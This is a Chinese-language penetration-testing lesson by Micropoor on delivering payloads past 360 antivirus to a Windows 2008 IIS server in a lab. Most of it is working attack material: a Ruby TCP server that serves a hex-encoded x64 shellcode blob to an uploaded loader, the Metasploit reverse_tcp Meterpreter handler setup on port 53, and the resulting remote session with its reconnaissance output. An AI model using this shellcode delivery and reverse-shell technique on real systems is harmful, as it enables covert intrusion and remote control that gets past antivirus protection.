攻击机: 192.168.1.4 Debian
靶机: 192.168.1.2 Windows 2008

目标机安装:360卫士+360杀毒

  1. [*] 磁盘列表 [ C:D:E: ]
  2. C:\inetpub\wwwroot\> tasklist
  3. 映像名称 PID 会话名 会话\# 内存使用
  4. ========================= ======== ================ =========== ============
  5. System Idle Process 0 0 24 K
  6. System 4 0 372 K
  7. smss.exe 236 0 956 K
  8. csrss.exe 324 0 5,572 K
  9. csrss.exe 364 1 14,452 K
  10. wininit.exe 372 0 4,508 K
  11. winlogon.exe 408 1 5,364 K
  12. services.exe 468 0 7,376 K
  13. lsass.exe 476 0 9,896 K
  14. lsm.exe 484 0 3,876 K
  15. svchost.exe 576 0 8,684 K
  16. vmacthlp.exe 632 0 3,784 K
  17. svchost.exe 676 0 7,384 K
  18. svchost.exe 764 0 12,716 K
  19. svchost.exe 800 0 29,792 K
  20. svchost.exe 848 0 11,248 K
  21. svchost.exe 900 0 9,308 K
  22. svchost.exe 940 0 16,184 K
  23. svchost.exe 332 0 11,800 K
  24. spoolsv.exe 548 0 15,568 K
  25. svchost.exe 1052 0 8,228 K
  26. svchost.exe 1076 0 8,808 K
  27. svchost.exe 1144 0 2,576 K
  28. VGAuthService.exe 1216 0 10,360 K
  29. vmtoolsd.exe 1300 0 18,068 K
  30. ManagementAgentHost.exe 1332 0 8,844 K
  31. svchost.exe 1368 0 11,884 K
  32. WmiPrvSE.exe 1768 0 13,016 K
  33. dllhost.exe 1848 0 11,224 K
  34. msdtc.exe 1940 0 7,736 K
  35. WmiPrvSE.exe 1440 0 19,768 K
  36. mscorsvw.exe 296 0 4,732 K
  37. mscorsvw.exe 584 0 5,088 K
  38. sppsvc.exe 1476 0 8,408 K
  39. taskhost.exe 2612 1 6,344 K
  40. dwm.exe 2868 1 4,604 K
  41. explorer.exe 2896 1 44,912 K
  42. vmtoolsd.exe 3008 1 17,744 K
  43. TrustedInstaller.exe 2268 0 15,776 K
  44. 360Tray.exe 2684 1 6,056 K
  45. 360sd.exe 2636 1 1,316 K
  46. ZhuDongFangYu.exe 2456 0 14,292 K
  47. 360rp.exe 1712 1 27,072 K
  48. SoftMgrLite.exe 864 1 16,816 K
  49. w3wp.exe 3300 0 42,836 K
  50. svchost.exe 3840 0 4,584 K
  51. notepad.exe 3712 1 5,772 K
  52. cmd.exe 3384 0 2,376 K
  53. conhost.exe 3520 0 3,420 K
  54. tasklist.exe 3096 0 5,276 K 58

第九十二课:实战中的Payload应用 - 图1

  1. C:\> dir
  2. 驱动器 C 中的卷没有标签。
  3. 卷的序列号是 C6F89BAB
  4. C:\ 的目录
  5. 2017/12/13 03:28 <DIR> inetpub
  6. 2009/07/14 11:20 <DIR> PerfLogs
  7. 2017/12/13 03:28 <DIR> Program Files
  8. 2019/01/23 14:09 <DIR> Program Files (x86)
  9. 2019/01/23 14:15 <DIR> Users
  10. 2017/12/13 03:25 <DIR> Windows
  11. 0 个文件 0 字节
  12. 6 个目录 21,387,132,928 可用字节

第九十二课:实战中的Payload应用 - 图2

目标机位x64位 Windows 2008

  1. C:\> ver
  2. Microsoft Windows [版本 6.1.7600]

第九十二课:实战中的Payload应用 - 图3

配置payload:

  1. root@John:/var/www/html# cat ./Micropoor_rev.rb
  2. require 'socket'
  3. if ARGV.empty?
  4. puts "Usage:"
  5. puts "Micropoor.rb port"
  6. exit
  7. end
  8. PORT = ARGV.first.to_i
  9. def handle_connection(client)
  10. puts "Payload is on‐line \#{client}"
  11. client.write("4831c94881e9c0ffffff488d05efffffff48bb32667fcceeadb9f74
  12. 8315827482df8ffffffe2f4ce2efc281e4575f732663e9daffdeba6642e4e1e8be532a552
  13. 2ef49ef6e532a5122ef4bebee5b640782c32fd27e588379e5a1eb0ec8199b6f3af728def6
  14. c5b1a60272e8465ff997c705a37cd3ecb388f2a6d7dc36bdfb9f732edff44eeadb9bfb7a6
  15. 0baba6ac69a7b92e678865ed99be33b69c9aa65270b6b952f784ef7bf4c6fb2e4e0c42ec7
  16. 83e3f277e0dd64dcc067e6533e8e6e8802647be278865ed9dbe33b6198d65a1f1b3b92663
  17. 85ef7df87c36ee37cd3eece1b66a382696aff5f8ae733c374f028df8a5cd86278db7f7f17
  18. c208f34331152e4be8c110cfeb19e8bf732272985674bf176dec67ecceee430127bda7dcc
  19. ee98795f33623e98a7245dbbbb973e76a2da9ff0cdb3334504c5b8f63266268d5484399c3
  20. 299aaa6e4ece7a7622b4e05a39c79bfcda637452ce546377aefbe8d5447b628d299aa8467
  21. 6ad3e7733e33450ce5300e73dce6699acc4622b7a60bc6a7527782d78eeccceeadf174de7
  22. 637450ce0883e58623e94a62440b68864a604b1526c74ca660199a62e7dd76cef89a6aeec
  23. e09f32767fccaff5f17ec02e4e05af17e15361838019a6247abebba132fd27e430077aefa
  24. 5846754f84d30bfb79311783a0f321b5794affae09f32267fccaff5d3f76827c5c7c1a289
  25. 08e731268d54d8d7ba5399aa85116350cbcd998084ef6ef1def42efa3a9b19f808d53e15ccb7e47e35c2d3dd9a1178b9f7")
  26. client.close
  27. end
  28. socket = TCPServer.new('0.0.0.0', PORT)
  29. puts "Listening on \#{PORT}. "
  30. while client = socket.accept
  31. Thread.new { handle_connection(client)}
  32. end
  33. root@John:/var/www/html# ruby ./Micropoor_rev.rb 8080
  34. Listening on 8080.

第九十二课:实战中的Payload应用 - 图4

上传Micropoor_shellcode_x64.exe

第九十二课:实战中的Payload应用 - 图5

配置msf:

  1. msf exploit(multi/handler) > use exploit/multi/handler
  2. msf exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
  3. payload => windows/x64/meterpreter/reverse_tcp
  4. msf exploit(multi/handler) > show options
  5. Module options (exploit/multi/handler):
  6. Name Current Setting Required Description
  7. ‐‐‐‐ ‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐ ‐‐‐‐‐‐‐‐ ‐‐‐‐‐‐‐‐‐‐‐
  8. Payload options (windows/x64/meterpreter/reverse_tcp):
  9. Name Current Setting Required Description
  10. ‐‐‐‐ ‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐ ‐‐‐‐‐‐‐‐ ‐‐‐‐‐‐‐‐‐‐‐
  11. EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
  12. LHOST 192.168.1.4 yes The listen address (an interface may be specified)
  13. LPORT 53 yes The listen port
  14. Exploit target:
  15. Id Name
  16. ‐‐ ‐‐‐‐
  17. 0 Wildcard Target
  18. msf exploit(multi/handler) > exploit
  19. [*] Started reverse TCP handler on 192.168.1.4:53

第九十二课:实战中的Payload应用 - 图6

靶机执行:

第九十二课:实战中的Payload应用 - 图7

  1. msf exploit(multi/handler) > exploit
  2. [*] Started reverse TCP handler on 192.168.1.4:53
  3. [*] Sending stage (206403 bytes) to 192.168.1.2
  4. [*] Meterpreter session 6 opened (192.168.1.4:53 ‐> 192.168.1.2:49744)
  5. at 20190123 01:29:00 0500
  6. meterpreter > getuid
  7. Server username: IIS APPPOOL\DefaultAppPool
  8. meterpreter > sysinfo
  9. Computer : WIN5BMI9HGC42S
  10. OS : Windows 2008 R2 (Build 7600).
  11. Architecture : x64
  12. System Language : zh_CN
  13. Domain : WORKGROUP
  14. Logged On Users : 1
  15. Meterpreter : x64/windows
  16. meterpreter > ipconfig
  17. Interface 1
  18. ============
  19. Name : Software Loopback Interface 1
  20. Hardware MAC : 00:00:00:00:00:00
  21. MTU : 4294967295
  22. IPv4 Address : 127.0.0.1
  23. IPv4 Netmask : 255.0.0.0
  24. IPv6 Address : ::1
  25. IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff
  26. Interface 11
  27. ============
  28. Name : Intel(R) PRO/1000 MT Network Connection
  29. Hardware MAC : 00:0c:29:bc:0d:5c
  30. MTU : 1500
  31. IPv4 Address : 192.168.1.2
  32. IPv4 Netmask : 255.255.255.0
  33. IPv6 Address : fe80::5582:70c8:a5a8:8223
  34. IPv6 Netmask : ffff:ffff:ffff:ffff::

第九十二课:实战中的Payload应用 - 图8

  1. meterpreter > ps
  2. Process List
  3. ============
  4. PID PPID Name Arch Session User Path
  5. ‐‐‐ ‐‐‐‐ ‐‐‐‐ ‐‐‐‐ ‐‐‐‐‐‐‐ ‐‐‐‐ ‐‐‐‐
  6. 0 0 [System Process]
  7. 4 0 System
  8. 236 4 smss.exe
  9. 296 468 mscorsvw.exe
  10. 324 316 csrss.exe
  11. 332 468 svchost.exe
  12. 364 356 csrss.exe
  13. 372 316 wininit.exe
  14. 408 356 winlogon.exe
  15. 468 372 services.exe
  16. 476 372 lsass.exe
  17. 484 372 lsm.exe
  18. 548 468 spoolsv.exe
  19. 576 468 svchost.exe
  20. 584 468 mscorsvw.exe
  21. 632 468 vmacthlp.exe
  22. 676 468 svchost.exe
  23. 764 468 svchost.exe
  24. 800 468 svchost.exe
  25. 848 468 svchost.exe
  26. 864 2684 SoftMgrLite.exe
  27. 900 468 svchost.exe
  28. 940 468 svchost.exe
  29. 1052 468 svchost.exe
  30. 1076 468 svchost.exe
  31. 1144 468 svchost.exe
  32. 1216 468 VGAuthService.exe
  33. 1300 468 vmtoolsd.exe
  34. 1332 468 ManagementAgentHost.exe
  35. 1368 468 svchost.exe
  36. 1440 576 WmiPrvSE.exe
  37. 1476 468 sppsvc.exe
  38. 1712 2636 360rp.exe
  39. 1768 576 WmiPrvSE.exe
  40. 1848 468 dllhost.exe
  41. 1940 468 msdtc.exe
  42. 2456 468 ZhuDongFangYu.exe
  43. 2612 468 taskhost.exe
  44. 2636 1096 360sd.exe
  45. 2684 1096 360Tray.exe
  46. 2788 3408 Micropoor_shellcode_x64.exe x64 0 IIS APPPOOL\DefaultAppPool C:\inetpub\wwwroot\Micropoor_shellcode_x64.exe
  47. 2868 900 dwm.exe
  48. 2896 2852 explorer.exe
  49. 3008 2896 vmtoolsd.exe
  50. 3196 468 svchost.exe
  51. 3300 1368 w3wp.exe x64 0 IIS APPPOOL\DefaultAppPool c:\windows\system32\inetsrv\w3wp.exe
  52. 3408 3300 cmd.exe x64 0 IIS APPPOOL\DefaultAppPool C:\Windows\system32\cmd.exe
  53. 3712 2896 notepad.exe
  54. 4092 324 conhost.exe x64 0 IIS APPPOOL\DefaultAppPool C:\Windows\system32\conhost.exe
  55. meterpreter >

第九十二课:实战中的Payload应用 - 图9

靶机:

第九十二课:实战中的Payload应用 - 图10

附录:

Micropoor_shellcode for payload backdoor

https://micropoor.blogspot.com/2019/01/micropoorshellcode-for-payload-backdoor.html

Micropoor